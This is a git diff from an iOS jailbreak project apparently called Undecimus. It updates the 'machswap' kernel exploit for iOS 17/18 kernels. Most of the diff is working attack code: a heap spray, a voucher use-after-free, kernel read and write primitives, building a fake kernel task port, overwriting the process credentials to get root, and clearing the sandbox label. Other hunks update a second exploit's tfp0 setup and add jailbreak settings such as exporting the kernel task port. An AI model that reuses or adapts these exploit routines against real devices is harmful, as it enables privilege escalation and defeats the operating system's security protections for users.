#ifdef __cplusplus
|
||||
extern "C"
|
||||
#endif
|
||||
int lzssdec(int argc,char**argv);
|
||||
|
||||
#endif /* lzssdec_h */
|
||||
@@ -0,0 +1,11 @@
|
||||
#ifndef MACHSWAP2_PWN_H
|
||||
#define MACHSWAP2_PWN_H
|
||||
|
||||
#include <mach/mach.h>
|
||||
|
||||
#include "common.h"
|
||||
#include "machswap_offsets.h"
|
||||
|
||||
kern_return_t machswap2_exploit(machswap_offsets_t *offsets);
|
||||
|
||||
#endif
|
||||
File diff suppressed because it is too large
Load Diff
@@ -6,6 +6,10 @@ typedef struct {
|
||||
/* strings kernel | grep 'Darwin' */
|
||||
const char *release;
|
||||
|
||||
cpu_type_t cpu_type;
|
||||
/* CPU_SUBTYPE for supported */
|
||||
cpu_subtype_t cpu_subtype;
|
||||
|
||||
/* basically will always be: 0xfffffff007004000 */
|
||||
uint64_t kernel_image_base;
|
||||
} constant;
|
||||
|
||||
@@ -12,6 +12,33 @@ static machswap_offsets_t *machswap_offsets[] =
|
||||
.constant =
|
||||
{
|
||||
.release = "18.",
|
||||
.cpu_subtype = CPU_SUBTYPE_ARM64E,
|
||||
.kernel_image_base = 0xfffffff007004000,
|
||||
},
|
||||
.struct_offsets =
|
||||
{
|
||||
.proc_pid = 0x60,
|
||||
.proc_task = 0x10,
|
||||
.proc_ucred = 0xf8,
|
||||
.task_vm_map = 0x20,
|
||||
.task_bsd_info = 0x368,
|
||||
.task_itk_self = 0xd8,
|
||||
.task_itk_registered = 0x2e8,
|
||||
.task_all_image_info_addr = 0x3a8,
|
||||
.task_all_image_info_size = 0x3b0,
|
||||
},
|
||||
.iosurface =
|
||||
{
|
||||
.create_outsize = 0xdd0,
|
||||
.get_external_trap_for_index = 0xb7,
|
||||
},
|
||||
},
|
||||
&(machswap_offsets_t)
|
||||
{
|
||||
.constant =
|
||||
{
|
||||
.release = "18.",
|
||||
.cpu_subtype = CPU_SUBTYPE_ARM64_V8,
|
||||
.kernel_image_base = 0xfffffff007004000,
|
||||
},
|
||||
.struct_offsets =
|
||||
@@ -26,7 +53,7 @@ static machswap_offsets_t *machswap_offsets[] =
|
||||
.task_all_image_info_addr = 0x398,
|
||||
.task_all_image_info_size = 0x3a0,
|
||||
},
|
||||
.iosurface =
|
||||
.iosurface =
|
||||
{
|
||||
.create_outsize = 0xdd0,
|
||||
.get_external_trap_for_index = 0xb7,
|
||||
@@ -37,6 +64,7 @@ static machswap_offsets_t *machswap_offsets[] =
|
||||
.constant =
|
||||
{
|
||||
.release = "17.",
|
||||
.cpu_subtype = CPU_SUBTYPE_ARM_ALL,
|
||||
.kernel_image_base = 0xfffffff007004000,
|
||||
},
|
||||
.struct_offsets =
|
||||
@@ -60,23 +88,67 @@ static machswap_offsets_t *machswap_offsets[] =
|
||||
NULL,
|
||||
};
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <sys/sysctl.h>
|
||||
#include <mach/machine.h>
|
||||
|
||||
machswap_offsets_t *get_machswap_offsets(void)
|
||||
{
|
||||
struct utsname u;
|
||||
if (uname(&u) != 0)
|
||||
{
|
||||
LOG("uname: %s", strerror(errno));
|
||||
return 0;
|
||||
size_t size;
|
||||
cpu_type_t cpu_type;
|
||||
size = sizeof(cpu_type_t);
|
||||
if (sysctlbyname("hw.cputype", &cpu_type, &size, NULL, 0) == -1) {
|
||||
LOG("hw.cputype: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
cpu_subtype_t cpu_subtype;
|
||||
size = sizeof(cpu_subtype_t);
|
||||
if (sysctlbyname("hw.cpusubtype", &cpu_subtype, &size, NULL, 0) == -1) {
|
||||
LOG("hw.cpusubtype: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
int ctl[2];
|
||||
ctl[0] = CTL_KERN;
|
||||
ctl[1] = KERN_OSRELEASE;
|
||||
|
||||
if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
|
||||
LOG("kern.osrelease: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
char release[size];
|
||||
if (sysctl(ctl, 2, release, &size, NULL, 0) == -1) {
|
||||
LOG("kern.osrelease: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
|
||||
for (size_t i = 0; machswap_offsets[i] != 0; ++i)
|
||||
{
|
||||
if (strncmp(machswap_offsets[i]->constant.release, u.release, strlen(machswap_offsets[i]->constant.release)) == 0)
|
||||
if (strncmp(machswap_offsets[i]->constant.release, release, strlen(machswap_offsets[i]->constant.release)) == 0)
|
||||
{
|
||||
return machswap_offsets[i];
|
||||
if (machswap_offsets[i]->constant.cpu_subtype == cpu_subtype ||
|
||||
machswap_offsets[i]->constant.cpu_subtype == CPU_SUBTYPE_ARM_ALL) {
|
||||
return machswap_offsets[i];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
LOG("Failed to get offsets for kernel version: %s", u.version);
|
||||
ctl[1] = KERN_VERSION;
|
||||
|
||||
if (sysctl(ctl, 2, NULL, &size, NULL, 0) == -1 && errno != ENOMEM) {
|
||||
LOG("kern.version: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
char version[size];
|
||||
if (sysctl(ctl, 2, version, &size, NULL, 0) == -1) {
|
||||
LOG("kern.version: %s", strerror(errno));
|
||||
return NULL;
|
||||
}
|
||||
|
||||
LOG("Failed to get offsets for kernel version: %s", version);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
@@ -6,6 +6,6 @@
|
||||
#include "common.h"
|
||||
#include "machswap_offsets.h"
|
||||
|
||||
kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0, uint64_t *kbase);
|
||||
kern_return_t machswap_exploit(machswap_offsets_t *offsets);
|
||||
|
||||
#endif
|
||||
|
||||
+107
-110
@@ -216,8 +216,8 @@ static uint32_t message_size_for_kalloc_size(uint32_t size)
|
||||
static void trigger_gc_please()
|
||||
{
|
||||
// size = 100 * 16,384 * 256 = 419,430,400 = ~420mb (max)
|
||||
|
||||
const int gc_ports_cnt = 100;
|
||||
|
||||
const int gc_ports_cnt = 500;
|
||||
int gc_ports_max = gc_ports_cnt;
|
||||
mach_port_t gc_ports[gc_ports_cnt] = { 0 };
|
||||
|
||||
@@ -226,36 +226,63 @@ static void trigger_gc_please()
|
||||
memset(body, 0x41, body_size);
|
||||
|
||||
int64_t avgTime = 0;
|
||||
uint64_t maxTime = 0;
|
||||
uint64_t avgDeviation = 0;
|
||||
uint64_t maxDeviation = 0;
|
||||
int extra_gc_count = 2;
|
||||
|
||||
for (int i = 0; i < gc_ports_cnt; i++)
|
||||
{
|
||||
uint64_t t0;
|
||||
int64_t tdelta;
|
||||
|
||||
|
||||
t0 = mach_absolute_time();
|
||||
gc_ports[i] = send_kalloc_message(body, body_size);
|
||||
tdelta = mach_absolute_time() - t0;
|
||||
|
||||
/*
|
||||
this won't necessarily get triggered on newer/faster devices (ie. >=A9)
|
||||
this is mainly designed for older devices (in my case, A7) where spraying
|
||||
such a large amount of data is a painful process
|
||||
the idea here is to look for a longer spray which signals that GC may have
|
||||
taken place
|
||||
*/
|
||||
if (avgTime && tdelta - avgTime > avgTime/2)
|
||||
uint64_t deviation = llabs(tdelta - avgTime);
|
||||
if (i == 0) {
|
||||
avgTime = maxTime = tdelta;
|
||||
continue;
|
||||
}
|
||||
|
||||
/*
|
||||
The idea here is to look for an abnormally longer spray which signals that GC may have
|
||||
taken place
|
||||
*/
|
||||
// TODO: Remove this log before merging to develop
|
||||
// LOG("%d: T:%lld avg T:%lld D:%lld max D:%lld avg D:%lld", i, tdelta, avgTime, deviation, maxDeviation, avgDeviation);
|
||||
|
||||
if (tdelta - avgTime > avgTime*2 ||
|
||||
(deviation > MAX(avgDeviation * 2, 0x10000)) )
|
||||
{
|
||||
LOG("got gc at %d -- breaking", i);
|
||||
LOG("got gc at %d", i);
|
||||
if (extra_gc_count-- > 0) {
|
||||
continue;
|
||||
}
|
||||
LOG("breaking");
|
||||
gc_ports_max = i;
|
||||
break;
|
||||
}
|
||||
avgTime = ( avgTime * i + tdelta ) / (i + 1);
|
||||
if (deviation > maxDeviation) {
|
||||
avgDeviation = maxDeviation?(avgDeviation * i + maxDeviation) / (i+1):deviation;
|
||||
maxDeviation = deviation;
|
||||
} else {
|
||||
avgDeviation = (avgDeviation * i + deviation) / (i+1);
|
||||
}
|
||||
|
||||
if (tdelta > maxTime) {
|
||||
avgTime = (avgTime * i + maxTime) / (i+1);
|
||||
maxTime = tdelta;
|
||||
} else {
|
||||
avgTime = (avgTime * i + tdelta) / (i+1);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
for (int i = 0; i < gc_ports_max; i++)
|
||||
{
|
||||
mach_port_destroy(mach_task_self(), gc_ports[i]);
|
||||
}
|
||||
|
||||
|
||||
sched_yield();
|
||||
sleep(1);
|
||||
}
|
||||
@@ -305,72 +332,19 @@ static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
|
||||
return err;
|
||||
}
|
||||
|
||||
static uint64_t kalloc(mach_port_t the_one, uint64_t size)
|
||||
{
|
||||
kern_return_t ret;
|
||||
mach_vm_address_t addr;
|
||||
|
||||
ret = mach_vm_allocate(the_one, (mach_vm_address_t *)&addr, (mach_vm_size_t)size, VM_FLAGS_ANYWHERE);
|
||||
if (ret != KERN_SUCCESS)
|
||||
{
|
||||
LOG("failed to call mach_vm_allocate(0x%llx): %x %s", size, ret, mach_error_string(ret));
|
||||
return (uint64_t)0x0;
|
||||
}
|
||||
|
||||
return (uint64_t)addr;
|
||||
}
|
||||
|
||||
static void kread(mach_port_t port, uint64_t addr, void *buf, size_t size)
|
||||
{
|
||||
kern_return_t ret;
|
||||
size_t offset = 0;
|
||||
|
||||
while (offset < size)
|
||||
{
|
||||
mach_vm_size_t sz, chunk = 0xfff;
|
||||
if (chunk > size - offset)
|
||||
{
|
||||
chunk = size - offset;
|
||||
}
|
||||
|
||||
ret = mach_vm_read_overwrite(port, addr + offset, chunk, (mach_vm_address_t)buf + offset, &sz);
|
||||
if (ret != KERN_SUCCESS ||
|
||||
sz == 0) {
|
||||
LOG("failed to call mach_vm_read_overwrite (%llx): %x %s", addr, ret, mach_error_string(ret));
|
||||
break;
|
||||
}
|
||||
|
||||
offset += sz;
|
||||
}
|
||||
}
|
||||
|
||||
static uint64_t kread64(mach_port_t port, uint64_t addr)
|
||||
{
|
||||
uint64_t val = 0x0;
|
||||
kread(port, addr, (void *)&val, sizeof(val));
|
||||
return val;
|
||||
}
|
||||
|
||||
static void kwrite(mach_port_t port, uint64_t addr, void *buf, size_t len)
|
||||
{
|
||||
kern_return_t ret;
|
||||
|
||||
ret = mach_vm_write(port, addr, (vm_offset_t)buf, (mach_msg_type_number_t)len);
|
||||
|
||||
if (ret != KERN_SUCCESS)
|
||||
{
|
||||
LOG("failed to call mach_vm_write(0x%llx, 0x%p, 0x%zx): %x %s", addr, buf, len, ret, mach_error_string(ret));
|
||||
}
|
||||
}
|
||||
|
||||
static void kwrite64(mach_port_t port, uint64_t addr, uint64_t val)
|
||||
{
|
||||
kwrite(port, addr, &val, sizeof(val));
|
||||
}
|
||||
extern size_t kread(uint64_t where, void* p, size_t size);
|
||||
extern size_t kwrite(uint64_t where, const void* p, size_t size);
|
||||
extern uint64_t kmem_alloc(uint64_t size);
|
||||
extern void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);
|
||||
extern void prepare_rwk_via_tfp0(mach_port_t port);
|
||||
extern uint64_t kernel_base;
|
||||
extern uint64_t kernel_slide;
|
||||
extern uint64_t ReadKernel64(uint64_t kaddr);
|
||||
extern void WriteKernel64(uint64_t kaddr, uint64_t val);
|
||||
|
||||
// ********** ********** ********** ye olde pwnage ********** ********** **********
|
||||
|
||||
kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, uint64_t *kbase_back)
|
||||
kern_return_t machswap_exploit(machswap_offsets_t *offsets)
|
||||
{
|
||||
kern_return_t ret = KERN_SUCCESS;
|
||||
|
||||
@@ -379,11 +353,18 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, u
|
||||
|
||||
mach_port_t before[0x2000] = { };
|
||||
mach_port_t after[0x1000] = { };
|
||||
|
||||
host_t host = HOST_NULL;
|
||||
host_t original_host = HOST_NULL;
|
||||
thread_t thread = THREAD_NULL;
|
||||
|
||||
/********** ********** data hunting ********** **********/
|
||||
|
||||
host = mach_host_self();
|
||||
original_host = host;
|
||||
thread = mach_thread_self();
|
||||
vm_size_t pgsz = 0;
|
||||
ret = _host_page_size(mach_host_self(), &pgsz);
|
||||
ret = _host_page_size(host, &pgsz);
|
||||
pagesize = pgsz;
|
||||
LOG("page size: 0x%llx, %s", pagesize, mach_error_string(ret));
|
||||
if (ret != KERN_SUCCESS)
|
||||
@@ -523,25 +504,25 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, u
|
||||
};
|
||||
|
||||
mach_port_t p2;
|
||||
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);
|
||||
ret = host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);
|
||||
|
||||
mach_port_t p3;
|
||||
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);
|
||||
ret = host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);
|
||||
|
||||
/* allocate 0x2000 vouchers to alloc some new fresh pages */
|
||||
for (int i = 0; i < 0x2000; i++)
|
||||
{
|
||||
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
|
||||
ret = host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
|
||||
}
|
||||
|
||||
/* alloc our target uaf voucher */
|
||||
mach_port_t p1;
|
||||
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
|
||||
ret = host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
|
||||
|
||||
/* allocate 0x1000 more vouchers */
|
||||
for (int i = 0; i < 0x1000; i++)
|
||||
{
|
||||
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
|
||||
ret = host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
|
||||
}
|
||||
|
||||
/*
|
||||
@@ -561,7 +542,7 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, u
|
||||
*/
|
||||
|
||||
/* set up to trigger the bug */
|
||||
ret = thread_set_mach_voucher(mach_thread_self(), p1);
|
||||
ret = thread_set_mach_voucher(thread, p1);
|
||||
|
||||
ret = task_swap_mach_voucher(mach_task_self(), p1, &p2);
|
||||
|
||||
@@ -600,7 +581,7 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, u
|
||||
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
|
||||
|
||||
/* fingers crossed we get a userland handle onto our 'fakeport' object */
|
||||
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
|
||||
ret = thread_get_mach_voucher(thread, 0, &real_port_to_fake_voucher);
|
||||
|
||||
LOG("port: %x", real_port_to_fake_voucher);
|
||||
|
||||
@@ -608,6 +589,7 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets, task_t *tfp0_back, u
|
||||
LOG("WE REALLY POSTED UP ON THIS BLOCK");
|
||||
|
||||
mach_port_t the_one = real_port_to_fake_voucher;
|
||||
prepare_for_rw_with_fake_tfp0(the_one);
|
||||
|
||||
/* set our fakeport back to a TASK port and setup arbitrary read via pid_for_task */
|
||||
fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
|
||||
@@ -757,7 +739,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
#define KERNEL_HEADER_OFFSET 0x4000
|
||||
#define KERNEL_SLIDE_STEP 0x100000
|
||||
|
||||
uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
|
||||
kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
|
||||
|
||||
do
|
||||
{
|
||||
@@ -772,10 +754,10 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
|
||||
kernel_base -= KERNEL_SLIDE_STEP;
|
||||
} while (true);
|
||||
|
||||
uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;
|
||||
|
||||
LOG("kernel slide: 0x%llx", kslide);
|
||||
kernel_slide = kernel_base - offsets->constant.kernel_image_base;
|
||||
|
||||
LOG("kernel slide: 0x%llx", kernel_slide);
|
||||
LOG("kernel base: 0x%llx", kernel_base);
|
||||
|
||||
/* try and read our kbase to make sure our read is working properly */
|
||||
@@ -789,7 +771,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
LOG("read kernel base value: %x", kbase_value);
|
||||
|
||||
/* find realhost */
|
||||
ret = send_port(the_one, mach_host_self());
|
||||
ret = send_port(the_one, host);
|
||||
if (ret != KERN_SUCCESS)
|
||||
{
|
||||
LOG("failed to send_port: %x %s", ret, mach_error_string(ret));
|
||||
@@ -921,7 +903,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
|
||||
/* the_one should now have access to kernel mem */
|
||||
|
||||
uint64_t kbase_data = kread64(the_one, kernel_base);
|
||||
uint64_t kbase_data = ReadKernel64(kernel_base);
|
||||
|
||||
if ((uint32_t)kbase_data != MH_MAGIC_64)
|
||||
{
|
||||
@@ -934,7 +916,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
|
||||
/* allocate kernel task */
|
||||
|
||||
uint64_t kernel_task_buf = kalloc(the_one, 0x600);
|
||||
uint64_t kernel_task_buf = kmem_alloc(0x600);
|
||||
if (kernel_task_buf == 0x0)
|
||||
{
|
||||
LOG("failed to allocate kernel_task_buf!");
|
||||
@@ -950,12 +932,12 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
we use it for storing the kernel base and kernel slide values
|
||||
*/
|
||||
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
|
||||
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;
|
||||
*(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kernel_slide;
|
||||
|
||||
kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);
|
||||
kwrite(kernel_task_buf, (void *)fake_task, 0x600);
|
||||
|
||||
/* allocate kernel port */
|
||||
uint64_t kernel_port_buf = kalloc(the_one, 0x300);
|
||||
uint64_t kernel_port_buf = kmem_alloc(0x300);
|
||||
if (kernel_port_buf == 0x0)
|
||||
{
|
||||
LOG("failed to allocate kernel_port_buf!");
|
||||
@@ -966,19 +948,19 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
|
||||
fakeport->ip_kobject = kernel_task_buf;
|
||||
|
||||
kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);
|
||||
kwrite(kernel_port_buf, (void *)fakeport, 0x300);
|
||||
|
||||
/*
|
||||
host_get_special_port(4) patch
|
||||
allows the kernel task port to be accessed by any root process
|
||||
*/
|
||||
kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
|
||||
WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
|
||||
|
||||
/* eleveate creds to kernel */
|
||||
|
||||
int orig_uid = getuid();
|
||||
|
||||
uint64_t orig_ucred = kread64(the_one, ourproc + offsets->struct_offsets.proc_ucred);
|
||||
uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
|
||||
if (orig_ucred == 0x0)
|
||||
{
|
||||
LOG("failed to get orig_ucred!");
|
||||
@@ -987,7 +969,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
}
|
||||
LOG("orig_ucred: 0x%llx", orig_ucred);
|
||||
|
||||
uint64_t kern_ucred = kread64(the_one, kernproc + offsets->struct_offsets.proc_ucred);
|
||||
uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
|
||||
if (kern_ucred == 0x0)
|
||||
{
|
||||
LOG("failed to get kern_ucred!");
|
||||
@@ -996,7 +978,7 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
}
|
||||
LOG("kern_ucred: 0x%llx", kern_ucred);
|
||||
|
||||
kwrite64(the_one, ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
|
||||
WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
|
||||
|
||||
LOG("setuid: %d, uid: %d", setuid(0), getuid());
|
||||
if (getuid() != 0)
|
||||
@@ -1006,12 +988,16 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
goto out;
|
||||
}
|
||||
|
||||
|
||||
host = mach_host_self();
|
||||
mach_port_t hsp4;
|
||||
ret = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &hsp4);
|
||||
ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
|
||||
mach_port_deallocate(mach_host_self(), host);
|
||||
host = original_host;
|
||||
|
||||
/* de-elevate */
|
||||
|
||||
kwrite64(the_one, ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
|
||||
WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
|
||||
|
||||
LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
|
||||
if (getuid() != orig_uid)
|
||||
@@ -1022,8 +1008,8 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
}
|
||||
|
||||
/* unsandbox */
|
||||
uint64_t cr_label = kread64(the_one, orig_ucred + 0x78);
|
||||
kwrite64(the_one, cr_label + 0x10, 0);
|
||||
uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
|
||||
WriteKernel64(cr_label + 0x10, 0);
|
||||
|
||||
if (ret != KERN_SUCCESS ||
|
||||
!MACH_PORT_VALID(hsp4))
|
||||
@@ -1031,18 +1017,29 @@ value = value | ((uint64_t)read64_tmp << 32)
|
||||
LOG("failed to set hsp4! error: %x %s, port: %x", ret, mach_error_string(ret), hsp4);
|
||||
goto out;
|
||||
}
|
||||
|
||||
prepare_rwk_via_tfp0(hsp4);
|
||||
|
||||
/* test it */
|
||||
kbase_value = (uint32_t)(kread64(hsp4, kernel_base));
|
||||
kbase_value = (uint32_t)(ReadKernel64(kernel_base));
|
||||
if ((uint32_t)kbase_value != MH_MAGIC_64)
|
||||
{
|
||||
LOG("failed to read from kernel base & test hsp4!");
|
||||
ret = KERN_FAILURE;
|
||||
goto out;
|
||||
}
|
||||
|
||||
*tfp0_back = hsp4;
|
||||
*kbase_back = kernel_base;
|
||||
|
||||
if (MACH_PORT_VALID(host)) {
|
||||
mach_port_deallocate(mach_task_self(), host);
|
||||
host = MACH_PORT_NULL;
|
||||
original_host = HOST_NULL;
|
||||
}
|
||||
|
||||
if (MACH_PORT_VALID(thread)) {
|
||||
mach_port_deallocate(mach_task_self(), thread);
|
||||
thread = THREAD_NULL;
|
||||
}
|
||||
|
||||
ret = KERN_SUCCESS;
|
||||
|
||||
out:;
|
||||
|
||||
@@ -14,7 +14,7 @@
|
||||
#include <pthread.h>
|
||||
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include <common.h>
|
||||
|
||||
@@ -352,19 +352,23 @@ static void* do_thread(void* arg)
|
||||
mach_port_t exception_port = (mach_port_t)arg;
|
||||
|
||||
kern_return_t err;
|
||||
thread_t thread = mach_thread_self();
|
||||
err = thread_set_exception_ports(
|
||||
mach_thread_self(),
|
||||
thread,
|
||||
EXC_MASK_ALL,
|
||||
exception_port,
|
||||
EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
|
||||
ARM_THREAD_STATE64);
|
||||
|
||||
mach_port_deallocate(mach_task_self(), thread);
|
||||
|
||||
if (err != KERN_SUCCESS) {
|
||||
LOG("failed to set exception port");
|
||||
}
|
||||
|
||||
// make the thread port which gets sent in the message actually be the host port
|
||||
err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());
|
||||
host_t host = mach_host_self();
|
||||
err = thread_set_special_port(host, THREAD_KERNEL_PORT, host);
|
||||
mach_port_deallocate(mach_task_self(), host);
|
||||
if (err != KERN_SUCCESS) {
|
||||
LOG("failed to set THREAD_KERNEL_PORT");
|
||||
}
|
||||
@@ -499,7 +503,7 @@ static uint32_t early_rk32(uint64_t kaddr)
|
||||
LOG("pid_for_task returned %x", err);
|
||||
}
|
||||
LOG("read val via pid_for_task: %08x", val);
|
||||
free(pipe_contents);
|
||||
SafeFreeNULL(pipe_contents);
|
||||
return val;
|
||||
}
|
||||
|
||||
@@ -529,7 +533,7 @@ static mach_port_t prepare_tfp0(uint64_t vm_map, uint64_t receiver)
|
||||
// replace the ipc_kmsg:
|
||||
write(early_read_pipe_write_end, pipe_contents, PIPE_SIZE);
|
||||
|
||||
free(pipe_contents);
|
||||
SafeFreeNULL(pipe_contents);
|
||||
|
||||
// early_read_port is no longer only capable of reads!
|
||||
return early_read_port;
|
||||
|
||||
@@ -180,10 +180,10 @@ initialize_computed_offsets() {
|
||||
|
||||
// A list of offset initializations by platform.
|
||||
static struct initialization offsets[] = {
|
||||
{ "iPhone11,*", "16C50-16C104", offsets__iphone11_8__16C50 },
|
||||
{ "iPhone10,1", "16B92-16C101", offsets__iphone10_1__16B92 },
|
||||
{ "*", "16A366-16D5024a", offsets__iphone10_1__16B92 },
|
||||
{ "*", "15A5278f-15G77", offsets__iphone9_3__15E302 },
|
||||
{ "*", "16A366-16D5024a", offsets__iphone10_1__16B92 },
|
||||
{ "iPhone11,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
|
||||
{ "iPad8,*", "16A366-16D5024a", offsets__iphone11_8__16C50 },
|
||||
{ "*", "*", initialize_computed_offsets },
|
||||
};
|
||||
|
||||
|
||||
@@ -0,0 +1,70 @@
|
||||
//
|
||||
// prefs.h
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 5/3/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#ifndef prefs_h
|
||||
#define prefs_h
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdbool.h>
|
||||
|
||||
#define K_TWEAK_INJECTION "TweakInjection"
|
||||
#define K_LOAD_DAEMONS "LoadDaemons"
|
||||
#define K_DUMP_APTICKET "DumpAPTicket"
|
||||
#define K_REFRESH_ICON_CACHE "RefreshIconCache"
|
||||
#define K_BOOT_NONCE "BootNonce"
|
||||
#define K_EXPLOIT "Exploit"
|
||||
#define K_DISABLE_AUTO_UPDATES "DisableAutoUpdates"
|
||||
#define K_DISABLE_APP_REVOKES "DisableAppRevokes"
|
||||
#define K_OVERWRITE_BOOT_NONCE "OverwriteBootNonce"
|
||||
#define K_EXPORT_KERNEL_TASK_PORT "ExportKernelTaskPort"
|
||||
#define K_RESTORE_ROOTFS "RestoreRootFS"
|
||||
#define K_INCREASE_MEMORY_LIMIT "IncreaseMemoryLimit"
|
||||
#define K_ECID "Ecid"
|
||||
#define K_INSTALL_OPENSSH "InstallOpenSSH"
|
||||
#define K_INSTALL_CYDIA "InstallCydia"
|
||||
#define K_RELOAD_SYSTEM_DAEMONS "ReloadSystemDaemons"
|
||||
#define K_HIDE_LOG_WINDOW "HideLogWindow"
|
||||
#define K_RESET_CYDIA_CACHE "ResetCydiaCache"
|
||||
#define K_SSH_ONLY "SSHOnly"
|
||||
#define K_ENABLE_GET_TASK_ALLOW "EnableGetTaskAllow"
|
||||
#define K_SET_CS_DEBUGGED "SetCSDebugged"
|
||||
|
||||
typedef struct {
|
||||
bool load_tweaks;
|
||||
bool load_daemons;
|
||||
bool dump_apticket;
|
||||
bool run_uicache;
|
||||
const char *boot_nonce;
|
||||
bool disable_auto_updates;
|
||||
bool disable_app_revokes;
|
||||
bool overwrite_boot_nonce;
|
||||
bool export_kernel_task_port;
|
||||
bool restore_rootfs;
|
||||
bool increase_memory_limit;
|
||||
const char *ecid;
|
||||
bool install_cydia;
|
||||
bool install_openssh;
|
||||
bool reload_system_daemons;
|
||||
bool reset_cydia_cache;
|
||||
bool ssh_only;
|
||||
bool enable_get_task_allow;
|
||||
bool set_cs_debugged;
|
||||
bool hide_log_window;
|
||||
int exploit;
|
||||
} prefs_t;
|
||||
|
||||
prefs_t *new_prefs(void);
|
||||
prefs_t *copy_prefs(void);
|
||||
void release_prefs(prefs_t **prefs);
|
||||
bool load_prefs(prefs_t *prefs);
|
||||
bool set_prefs(prefs_t *prefs);
|
||||
void register_default_prefs(void);
|
||||
void repair_prefs(void);
|
||||
void reset_prefs(void);
|
||||
|
||||
#endif /* prefs_h */
|
||||
@@ -0,0 +1,135 @@
|
||||
//
|
||||
// prefs.c
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 5/3/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
